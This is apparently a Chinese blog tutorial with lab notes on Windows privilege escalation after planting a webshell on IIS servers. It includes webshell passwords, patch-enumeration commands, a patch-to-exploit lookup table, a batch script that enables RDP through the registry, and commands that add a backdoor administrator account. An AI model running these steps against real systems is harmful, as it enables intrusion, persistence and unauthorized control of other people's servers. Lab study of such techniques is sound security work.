hackmap-[windows权限提升(windows提权思路)]
hackmap-[windows权限提升{windows提权思路}]
- 1.前言
-
- 1.1.提权分类
-
- 水平权限提升(越权)
- 垂直权限提升
- 1.2 windows提权概述
- 2.windows基于WebShell提权
-
- 2.1 前言
-
- 2.1.1 asp大马 vs aspx大马(windows2003+IIS)
-
- 1)asp大马
- 2)aspx大马
- 3)小结
- 2.1.2 基于系统漏洞提权
-
- 1)信息收集
- 2)漏洞补丁对照表
- 3)提权过程
- 3.实战
-
- 3.1针对2003 KB952004 提权实验
-
- step1:利用aspx大马进行信息搜集——补丁安装情况
- step2:针对上述漏洞上传提权工具
- step3:提权
- 3.2 针对2008 IIS提权实验
-
- 建立站点
- 上传aspx大马和asp大马(做对比)
- step1:信息搜集——补丁信息
- step2:上传EXP提权
- step3:命令行下开启3389端口
- step4:创建windows用户
- step5:远程桌面连接
1.前言
1.1.提权分类
水平权限提升(越权)
A,B同级用户越权
垂直权限提升
普通用户获得了管理员的权限
Web 用户直接提权成管理员用户
1.2 windows提权概述
Exp 提权
数据库 SQLServer、MYSQL UDF 提权
第三⽅软件提权。
2.windows基于WebShell提权
2.1 前言
基于webshell提权的前提是,通过文件上传等漏洞获得webshell。
2.1.1 asp大马 vs aspx大马(windows2003+IIS)
1)asp大马
(1)上传asp大马 style.asp 密码1314
![hackmap-[windows权限提升(windows提权思路)]_第1张图片](http://img.e-com-net.com/image/info8/611133421b2c438bae766993db1c6141.jpg)
(2)执行命令whoami,提示拒绝访问。
2)aspx大马
(1)上传aspx大马
![hackmap-[windows权限提升(windows提权思路)]_第2张图片](http://img.e-com-net.com/image/info8/2a1e262b5b664be984c42c1bfd5026ce.jpg)
(2)执行一般命令时不会像asp木马一样,拒绝访问。
![hackmap-[windows权限提升(windows提权思路)]_第3张图片](http://img.e-com-net.com/image/info8/cc81d744e6ef43fc91f539dec861e649.jpg)
3)小结
IIS尽量用aspx 大马,因为asp 大马脚本权限可能会比较低 ,可以尝试上传aspx 的大马。
2.1.2 基于系统漏洞提权
思路:找补丁——>找漏洞——>找EXP
以windows2003 IIS提权为例。
1)信息收集
这一步信息收集的目的是测试目标系统安装了哪些补丁。
2003
systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\a.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
大于2003
systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\a.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
2)漏洞补丁对照表
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB944653 MS07-067
KB952004 MS09-012 PR
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011
kb942831 MS08-005
KB2503665 MS11-046
KB2592799 MS11-080
KB956572 MS09-012 烤肉
KB2621440 MS12-020
KB977165 MS10-015 Ms Viru
KB4013081 MS17-017
KB3139914 MS16-032
KB3124280 MS16-016
KB3134228 MS16-014
KB3079904 MS15-097
KB3077657 MS15-077
KB3045171 MS15-051
KB3000061 MS14-058
KB2829361 MS13-046
KB2850851 MS13-053 EPATHOBJ 0day 限32位
KB2707511 MS12-042 sysret -pid
KB2124261 KB2271195 MS10-065 IIS7
KB3198234 MS16-135
KB970483 MS09-020 IIS6
KB3031432 MS15-015
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS15-097 [KB3089656] [remote code execution] (win8.1/2012)
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)
MS14-070 [KB2989935] [Kernel Driver] (2003)
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)
MS14-002 [KB2914368] [NDProxy] (2003/XP)
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)
MS11-080 [KB2592799] [AFD.sys] (2003/XP)
MS11-062 [KB2566454] [NDISTAPI] (2003/XP)
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)
MS10-092 [KB2305420] [Task Scheduler] (2008/7)
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068 [KB957097] [Remote Code Execution] (2000/XP)
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
3)提权过程
1.执行cmd命令
2.上传提权exp
需要目录写权限? 哪些目录有写权限?
【日志、缓存、回收站、大马所在目录(尝试过,失败了)】 exe
3.在命令行下开启3389 端口
2003
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
03|08 通用(--3389.bat)
echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg
4.创建用户
net user hack 123.com /add net localgroup administrators hack /add
5.远程连接
3.实战
3.1针对2003 KB952004 提权实验
step1:利用aspx大马进行信息搜集——补丁安装情况
![hackmap-[windows权限提升(windows提权思路)]_第4张图片](http://img.e-com-net.com/image/info8/da77ab26c6ca494e9e74e310a16c6c58.jpg)
step2:针对上述漏洞上传提权工具
![hackmap-[windows权限提升(windows提权思路)]_第5张图片](http://img.e-com-net.com/image/info8/5ec5914dc65f4f8382d16be31cd386d6.jpg)
step3:提权
3.2 针对2008 IIS提权实验
建立站点
上传aspx大马和asp大马(做对比)
⚠️:IIS6.0比较特殊,asp大马不能执行命令。
asp大马 style.asp 1314
aspx 大马 jmdx.aspx d7sDs,/2sDSMEKX
![hackmap-[windows权限提升(windows提权思路)]_第6张图片](http://img.e-com-net.com/image/info8/017f3767e680442c8920db27ef92c53d.jpg)
step1:信息搜集——补丁信息
systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB3031432) do @type C:\Windows\Temp\a.txt|@find /i “%i”|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
![hackmap-[windows权限提升(windows提权思路)]_第7张图片](http://img.e-com-net.com/image/info8/650780977b2044f6abe15b4993fb2403.jpg)
目标:KB3045171
KB3045171 MS15-051
KB3031432 MS15-015 【】
没有找到合适的EXP。
添加KB到信息搜集的代码中,KB956572 KB952004
2003用过 KB952004
这次用KB956572
step2:上传EXP提权
⚠️:不同的大马权限是不同的,多尝试一些目录。
C:\windows\temp
![hackmap-[windows权限提升(windows提权思路)]_第8张图片](http://img.e-com-net.com/image/info8/cfcfe00a0e3249418d7c123c49e3cd3a.jpg)
上传成功。KB956572 对应的EXP提权。
提权:
![hackmap-[windows权限提升(windows提权思路)]_第9张图片](http://img.e-com-net.com/image/info8/11ba8a6f4f034f12a8108034c92d79b9.jpg)
KB956572 不好用。
![hackmap-[windows权限提升(windows提权思路)]_第10张图片](http://img.e-com-net.com/image/info8/cb1258ea68ec443d868d5e64f0862b78.jpg)
KB 952004 提权也不好用。
MS15-051试试:
![hackmap-[windows权限提升(windows提权思路)]_第11张图片](http://img.e-com-net.com/image/info8/4ddd125bc52b4f439bbcc8834f9d8d73.jpg)
不行。
用x64的试试。
![hackmap-[windows权限提升(windows提权思路)]_第12张图片](http://img.e-com-net.com/image/info8/62df5ca8e912496ebdf5db3d98635a05.jpg)
![hackmap-[windows权限提升(windows提权思路)]_第13张图片](http://img.e-com-net.com/image/info8/5ee6f6e8b3ec4a9696d542c958578084.jpg)
成功提权。
step3:命令行下开启3389端口
上传3389.bat 文件
echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg
执行
![hackmap-[windows权限提升(windows提权思路)]_第14张图片](http://img.e-com-net.com/image/info8/8b18794dff2b47aba1a61508ba3f647b.jpg)
查看是否开启成功:
![hackmap-[windows权限提升(windows提权思路)]_第15张图片](http://img.e-com-net.com/image/info8/6a78adf792ea41979e140f18aebbcd04.jpg)
step4:创建windows用户
net user sxk 123.com /add
net localgroup administrators sxk /add
![hackmap-[windows权限提升(windows提权思路)]_第16张图片](http://img.e-com-net.com/image/info8/8ed7ef0b697e41dda4c189d52eece642.jpg)
![hackmap-[windows权限提升(windows提权思路)]_第17张图片](http://img.e-com-net.com/image/info8/d6f1f00a3e984a5ab7767f2a274f4885.jpg)
step5:远程桌面连接
![hackmap-[windows权限提升(windows提权思路)]_第18张图片](http://img.e-com-net.com/image/info8/ba0176dd6d2447a6a7196e5e2847660f.jpg)
成功拿捏目标系统。